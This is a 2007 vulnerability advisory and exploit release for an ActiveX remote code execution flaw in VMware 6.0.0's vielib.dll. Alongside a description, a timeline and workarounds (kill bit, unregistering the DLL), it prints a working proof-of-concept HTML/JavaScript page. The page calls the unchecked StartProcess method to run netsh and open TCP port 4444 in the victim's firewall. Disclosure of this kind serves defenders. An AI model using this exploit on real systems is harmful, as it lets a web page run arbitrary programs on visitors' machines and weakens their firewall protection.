:. GOODFELLAS Security Research TEAM .:
:. http://goodfellas.shellcode.com.ar .:
vielib.dll VmWare Inc version 6.0.0 Remode Code Execution Exploit
Internal ID: VULWAR200707290.
vielib.dll is a library included in the Program Vmware Version 6.0.0 from Vmware Inc. Company.
Tested In
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.
The StartProcess method doesn't check if it's being called from the application,
or malicious users. Remote Attacker could craft a html page and execute code in
a remote system with the actual user privileges.
Any computer that uses this Sofware will be exposed to Remote Execution Code.
- Activate the Kill bit zero in clsid:7B9C5422-39AA-4C21-BEEF-645E42EB4529
- Unregister vielib.dll using regsvr32.
July 29 2007 -- Bug Discovery.
July 29 2007 -- Exploit published.
* callAX <callAX@shellcode.com.ar>
* GoodFellas Security Research Team <goodfellas.shellcode.com.ar>
Technical Details
StartProcess method needs three files (stdin, stdout, stderr) to success StartProcess. The exploit
is using three standard files that exists in every Microsoft Office 2003 Application.
<object id=ctrl classid="clsid:{7B9C5422-39AA-4C21-BEEF-645E42EB4529}"></object>
function Poc() {
arg1 = "C:\\windows\\system32\\netsh.exe"
arg2 = "C:\\windows\\system32\\netsh.exe firewall add portopening tcp 4444 GotIT"
arg3 = "C:\\windows\\system32\\"
arg4 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseneu.txt"
arg5 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseeng.txt"
arg6 = "C:\\Program Files\\Microsoft Office\\OFFICE11\\noiseenu.txt"
arg7 = "1"
ctrl.StartProcess(arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7)
<input language=JavaScript onclick=Poc() type=button value="Proof of Concept">
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